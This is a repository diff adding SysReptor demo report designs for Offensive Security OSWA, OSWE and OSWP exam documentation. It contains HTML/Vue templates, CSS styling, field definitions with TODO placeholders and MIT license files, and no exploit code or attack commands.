<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSWA Exam Documentation {.in-toc.numbered}
The Offensive Security OSWA exam documentation contains all efforts that were conducted in order to pass the Offensive Security Web Assessor exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has the technical knowledge required to pass the qualifications for the Offensive Security Web Assessor certification.
The student will be required to fill out this exam documentation fully and to include the following sections:
* Methodology walkthrough and detailed outline of steps taken
* Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.
* Any additional items that were not included
</markdown>
<pagebreak/>
<section>
<h1 id="findings" class="in-toc numbered">Findings</h1>
<div v-for="finding in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-if="finding.proof">
<h3 class="in-toc numbered">Local.txt/Proof.txt</h3>
<markdown :text="finding.proof" />
</div>
<div v-for="vulnerability in finding.vulnerabilities">
<h3 class="in-toc numbered">{{ vulnerability.reference}}</h3>
<markdown :text="vulnerability.details" />
</div>
<div v-if="finding.poc">
<h3 class="in-toc numbered" >PoC Code</h3>
<markdown :text="finding.poc" />
</div>
<div v-if="finding.screenshots">
<h3 class="in-toc numbered">Screenshots</h3>
<markdown :text="finding.screenshots" />
</div>
<div v-if="finding.steps">
<h3 class="in-toc numbered">Steps</h3>
<markdown :text="finding.steps" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #ce0075;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSWA Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Target"
origin = "core"
default = "TODO Target Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.poc]
type = "markdown"
label = "PoC Code"
origin = "custom"
default = "TODO Provide the final proof of concept code used to gain access to the server."
required = true
[finding_fields.proof]
type = "markdown"
label = "Proof.txt"
origin = "custom"
default = "TODO Provide the contents of local.txt and proof.txt"
required = true
[finding_fields.steps]
type = "markdown"
label = "Steps"
origin = "custom"
default = "TODO Provide a detailed account of your methodology in creating the exploits. The steps taken should be able to be easily followed and reproducible if necessary."
required = true
[finding_fields.screenshots]
type = "markdown"
label = "Screenshots"
origin = "custom"
default = "TODO Provide screenshots of local.txt and proof.txt contents as stated in the Exam Control Panel Objectives."
required = true
[finding_fields.vulnerabilities]
type = "list"
label = "Vulnerabilities"
origin = "custom"
required = true
[finding_fields.vulnerabilities.items]
type = "object"
label = ""
origin = "custom"
[finding_fields.vulnerabilities.items.properties]
[finding_fields.vulnerabilities.items.properties.details]
type = "markdown"
label = "Details"
origin = "custom"
default = "TODO Provide the method and steps used to find the vulnerability."
required = true
[finding_fields.vulnerabilities.items.properties.reference]
type = "string"
label = "Reference"
origin = "custom"
default = "Vulnerability X"
required = true
spellcheck = false
[report_preview_data]
[report_preview_data.report]
title = "OSWA Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "TODO This section is placed for any additional items that were not mentioned in the overall report."
[[report_preview_data.findings]]
title = "192.168.X.X"
cvss = ""
id = "25a70e70-515e-4664-b7ab-dffc2f2fe12e"
proof = "TODO Provide the contents of local.txt and proof.txt"
poc = "TODO Provide the method and steps used to find the vulnerability."
screenshots = "TODO Provide screenshots of local.txt and proof.txt contents as stated in the Exam Control Panel Objectives."
steps = "TODO Provide a detailed account of your methodology in creating the exploits. The steps taken should be able to be easily followed and reproducible if necessary."
[[report_preview_data.findings.vulnerabilities]]
reference = "Vulnerability X"
details = "TODO Provide the method and steps used to find the vulnerability."
[[report_preview_data.findings.vulnerabilities]]
reference = "Vulnerability X"
details = "TODO Provide the method and steps used to find the vulnerability."
[[report_preview_data.findings.vulnerabilities]]
reference = "Vulnerability X"
details = "TODO Provide the method and steps used to find the vulnerability."
[[assets]]
id = "61da17b8-8645-4a6b-b23c-fa907945a607"
name = "LICENSE"

21
demo_data/offsec-designs/oswe-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

563
demo_data/offsec-designs/oswe.toml Normal file
View File

@ -0,0 +1,563 @@
format = "projecttypes/v1"
id = "80ac1530-f930-41e4-ae3a-ba280fb31505"
name = "OSWE Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"proof",
"vulnerabilities",
"poc",
"screenshots",
"steps",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSWE Exam Documentation {.in-toc.numbered}
The Offensive Security OSWE exam documentation contains all efforts that were conducted in order to pass the Offensive Security Web Expert exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has the technical knowledge required to pass the qualifications for the Offensive Security Web Expert certification.
The student will be required to fill out this exam documentation fully and to include the following sections:
* Methodology walkthrough and detailed outline of steps taken
* Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.
* Each finding with included screenshots, walkthrough, sample code, and proof.txt if ap-plicable.
* Any additional items that were not included
</markdown>
<pagebreak/>
<section>
<h1 id="findings" class="in-toc numbered">Findings</h1>
<div v-for="(finding, index) in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-if="finding.proof">
<h3 class="in-toc numbered">Local.txt/Proof.txt</h3>
<markdown :text="finding.proof" />
</div>
<div v-for="vulnerability in finding.vulnerabilities">
<h3 class="in-toc numbered">{{ vulnerability.reference}}</h3>
<markdown :text="vulnerability.details" />
</div>
<div v-if="finding.poc">
<h3 class="in-toc numbered" >PoC Code</h3>
<markdown :text="finding.poc" />
</div>
<div v-if="finding.screenshots">
<h3 class="in-toc numbered">Screenshots</h3>
<markdown :text="finding.screenshots" />
</div>
<div v-if="finding.steps">
<h3 class="in-toc numbered">Steps</h3>
<markdown :text="finding.steps" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #8fce00;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSWE Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Target"
origin = "core"
default = "TODO Target Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.poc]
type = "markdown"
label = "PoC Code"
origin = "custom"
default = "TODO Provide the final proof of concept code used to gain access to the server."
required = true
[finding_fields.proof]
type = "markdown"
label = "Proof.txt"
origin = "custom"
default = "TODO Provide the contents of local.txt and proof.txt"
required = true
[finding_fields.steps]
type = "markdown"
label = "Steps"
origin = "custom"
default = "TODO Provide a detailed account of your methodology in creating the exploits. The steps taken should be able to be easily followed and reproducible if necessary."
required = true
[finding_fields.screenshots]
type = "markdown"
label = "Screenshots"
origin = "custom"
default = "TODO Provide screenshots of local.txt and proof.txt contents as stated in the Exam Control Panel Objectives."
required = true
[finding_fields.vulnerabilities]
type = "list"
label = "Vulnerabilities"
origin = "custom"
required = true
[finding_fields.vulnerabilities.items]
type = "object"
label = ""
origin = "custom"
[finding_fields.vulnerabilities.items.properties]
[finding_fields.vulnerabilities.items.properties.details]
type = "markdown"
label = "Details"
origin = "custom"
default = "TODO Provide the method and code used to find the vulnerability ."
required = true
[finding_fields.vulnerabilities.items.properties.reference]
type = "string"
label = "Reference"
origin = "custom"
default = "Vulnerability X"
required = true
spellcheck = false
[report_preview_data]
[report_preview_data.report]
title = "OSWE Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "TODO This section is placed for any additional items that were not mentioned in the overall report."
[[report_preview_data.findings]]
title = "192.168.X.X"
cvss = ""
id = "25a70e70-515e-4664-b7ab-dffc2f2fe12e"
proof = "TODO Provide the contents of local.txt and proof.txt"
poc = "TODO Provide the final proof of concept code used to gain access to the server."
screenshots = "TODO Provide screenshots of local.txt and proof.txt contents as stated in the Exam Control Panel Objectives."
steps = "TODO Provide a detailed account of your methodology in creating the exploits. The steps taken should be able to be easily followed and reproducible if necessary."
[[report_preview_data.findings.vulnerabilities]]
details = "TODO Provide the method and code used to find the vulnerability ."
reference = "Vulnerability X"
[[report_preview_data.findings.vulnerabilities]]
details = "TODO Provide the method and code used to find the vulnerability ."
reference = "Vulnerability X"
[[report_preview_data.findings.vulnerabilities]]
details = "TODO Provide the method and code used to find the vulnerability ."
reference = "Vulnerability X"
[[assets]]
id = "b7985a2b-aab2-41a1-a3f7-f035272a4c58"
name = "LICENSE"

21
demo_data/offsec-designs/oswp-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

514
demo_data/offsec-designs/oswp.toml Normal file
View File

@ -0,0 +1,514 @@
format = "projecttypes/v1"
id = "c465ed9d-546f-44ba-b519-eb3c036fda01"
name = "OSWP Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"description",
"proof",
"screenshots",
"steps",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSWP Exam Documentation {.in-toc.numbered}
The Offensive Security OSWP exam documentation contains all efforts that were conducted in order to pass the Offensive Security Wireless Professional exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has the technical knowledge required to pass the qualifications for the Offensive Security Wireless Professional certification.
## Requirements {.in-toc.numbered}
The student will be required to fill out this penetration testing report fully and to include the following sections:
* Methodology walkthrough and detailed outline of steps taken
* Each finding with included screenshots, walkthrough and sample commands
* Any additional items that were not included
</markdown>
<pagebreak/>
<section>
<h1 id="findings" class="in-toc numbered">Findings</h1>
<div v-for="finding in findings">
<markdown :text="finding.description" />
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-if="finding.proof">
<h3 class="in-toc numbered">Proof</h3>
<markdown :text="finding.proof" />
</div>
<div v-if="finding.screenshots">
<h3 class="in-toc numbered">Screenshots</h3>
<markdown :text="finding.screenshots" />
</div>
<div v-if="finding.steps">
<h3 class="in-toc numbered">Steps</h3>
<markdown :text="finding.steps" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #c37cc3;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
